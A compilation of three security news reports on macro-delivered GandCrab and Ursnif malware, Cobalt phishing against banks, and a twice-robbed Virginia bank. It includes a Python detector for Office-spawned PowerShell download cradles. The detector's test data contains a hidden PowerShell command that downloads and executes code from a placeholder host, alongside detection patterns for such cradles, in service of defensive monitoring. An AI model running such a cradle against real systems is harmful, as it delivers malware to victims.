GandCrab ransomware and Ursnif virus spreading via MS Word macros

By: Swati Khandelwal

Security researchers have discovered two separate malware campaigns, one of which is distributing the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, whereas the second one is only infecting victims with Ursnif malware.

Though the two campaigns appear to be the work of separate cybercriminal groups, they share many similarities. Both attacks start with phishing emails carrying an attached Microsoft Word document embedded with malicious macros, and both then use PowerShell to deliver fileless malware.

Ursnif is a data-stealing trojan that harvests sensitive information from compromised computers: it can steal banking credentials and browsing activity, log keystrokes, collect system and process information, and deploy additional backdoors.

Discovered earlier last year, GandCrab is a widespread ransomware threat that, like every other ransomware in the market, encrypts files on an infected system and demands that victims pay a ransom in digital currency to unlock them. Its developers demand payment primarily in DASH, which is more difficult to trace.

MS Docs + VBS macros = Ursnif and GandCrab Infection

The first malware campaign distributing two malware threats was discovered by security researchers at Carbon Black who located approximately 180 variants of MS Word documents in the wild that target users with malicious VBS macros.

If successfully executed, the malicious VBS macro runs a PowerShell script, which then uses a series of techniques to download and execute both Ursnif and GandCrab on the targeted systems.
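The delivery chain described above (Word document, VBS macro, PowerShell stager, download-and-execute) leaves a recognisable trace in process-creation telemetry: an Office application becoming the parent of a script host, and a PowerShell command line carrying download-cradle arguments. The following Python is an added detection example written for this page; it is not Carbon Black's or the article's code. The events it scans are constructed in the style of Windows process-creation records (parent image, image, command line) and are not real captures; the URL in the sample is a placeholder.

```python
"""Flag Office-spawned script hosts and PowerShell download cradles.

Added example for the macro -> PowerShell delivery chain. The event
records below are constructed test data, not real telemetry.
"""
import re

# Office applications that should rarely, if ever, spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters and LOLBins commonly launched by malicious macros.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line traits of a typical download-and-execute PowerShell stager.
SUSPICIOUS_ARGS = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote_download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|bitstransfer", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event.

    One point for an Office parent spawning a script host, plus one point
    per suspicious PowerShell argument pattern found in the command line.
    """
    reasons = []
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office_spawns_script_host:{parent}->{image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        for name, pattern in SUSPICIOUS_ARGS.items():
            if pattern.search(cmd):
                reasons.append(name)
    return len(reasons), reasons


def detect(events, threshold=2):
    """Return alerts for events whose score reaches the threshold.

    A threshold of 2 means a lone encoded command typed by an administrator
    does not alert, while an Office parent plus any cradle indicator does.
    """
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev["pid"], "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (hypothetical paths and command lines).
SAMPLE_EVENTS = [
    # Benign: a user opens a document from Explorer.
    {"pid": 1001,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": '"WINWORD.EXE" /n "C:\\Users\\alice\\invoice.docx"'},
    # Macro chain: Word spawns a hidden PowerShell download cradle.
    {"pid": 1002,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object "
                     "Net.WebClient).DownloadString('http://example.invalid/stage1')\""},
    # Administrator running an encoded command from a console: one indicator only.
    {"pid": 1003,
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -EncodedCommand ZQBj..."},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed events, only PID 1002 alerts: it scores one point for the Word-to-PowerShell parent relationship and four more for the hidden window, execution-policy bypass, in-memory execution and remote download arguments. The scoring is deliberately additive so that individual indicators can be tuned without turning the parent-child check into an all-or-nothing rule.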


Notorious cyber crime gang behind global bank hacking spree returns with new attacks

By: Danny Palmer


A notorious hacking group that targets financial organisations and is thought to be the perpetrator of cyber attacks against the SWIFT banking network and ATM systems has launched a new campaign targeting employees of two banks.

The Cobalt cyber crime gang is suspected of striking banks in more than 40 countries and potentially making as much as €10 million per heist. It’s estimated the attacks have caused over €1bn in damages.

Despite the suspected leader of the group being arrested as part of a Europol operation in March this year, Cobalt remained active, with security firms detecting new campaigns just weeks after the arrest took place.

Now two new Cobalt campaigns have been uncovered, this time targeting banks in Eastern Europe and Russia.

The new criminal activity, uncovered by Netscout Arbor, began in mid-August. The two banks being targeted by this latest campaign are NS Bank in Russia and Patria Bank in Romania.

In both cases, phishing emails appear to come from a financial vendor or partner related to the bank, a tactic that is used to trick victims into trusting the origin of the message and the sender.

“In at least one of the campaigns the attackers crafted an email that appeared to come from SEPA Europe (Single Euro Payments Area) with information about expanded coverage,” Richard Hummel, threat intelligence manager at Netscout, told ZDNet.

“The recipient of the email was encouraged to click on an embedded link to find more information pertaining to the expanded coverage area.”


Virginian Bank Robbed Twice in Eight Months

By: Phil Muncaster

The perils of phishing emails and cyber-insurance were laid bare this week after news emerged of an American bank that fell victim to hackers twice within eight months and is suing its provider for failing to cover the losses.

The Virginian National Bank of Blacksburg was hit in late May 2016 and again in January 2017 thanks to phishing emails which eventually resulted in the combined theft of $2.4m.

The first attack enabled attackers to install malware on a victim’s PC, allowing them to access the STAR interbank network and disable controls including PINs, daily withdrawal limits and anti-fraud measures, according to journalist Brian Krebs.

The attackers were then able to dispense over half a million dollars from customer accounts at ATMs around the country.

The second attack apparently used a booby-trapped Microsoft Word document to gain access to the bank’s Navigator software, which the attackers used to artificially credit various accounts with $2m before withdrawing funds from ATMs in the same way and deleting the evidence.

Chandu Ketkar, principal consultant at Synopsys, argued that the breaches came from failures of security awareness training, monitoring controls, emergency response, and policy around Office macros.

Ryan Wilk, vice president at NuData Security, added that phishing risk can be mitigated by migrating away from static username/password combinations.

“This is a clear example of why merchants and financial institutions are moving past the user’s personally identifiable information (PII) as a way to authenticate them and incorporating multi-layered solutions with passive biometrics and behavioral analytics,” he added. “These technologies thwart the reuse of data by fraudsters and, instead, verify users based on their behavioral information.”

In a further twist, the bank is now suing its provider, Everest National Insurance Company, for failing to pay out.